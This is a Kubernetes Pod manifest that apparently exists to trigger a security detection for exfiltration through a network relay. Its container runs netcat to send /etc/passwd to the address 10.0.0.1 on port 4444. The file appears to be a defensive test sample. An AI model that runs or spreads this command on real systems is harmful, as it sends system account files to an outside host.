apiVersion: v1
kind: Pod
metadata:
  name: network-relay-binary-exfiltration-activities-detected
spec:
  restartPolicy: Never
  containers:
  - name: network-relay-binary-exfiltration-activities-detected
    image: angelrita/base-ubuntu:latest
    #imagePullPolicy: Never
    command: ['sh']
    args: ['-c', 'nc 10.0.0.1 4444 < /etc/passwd; sleep infinity']
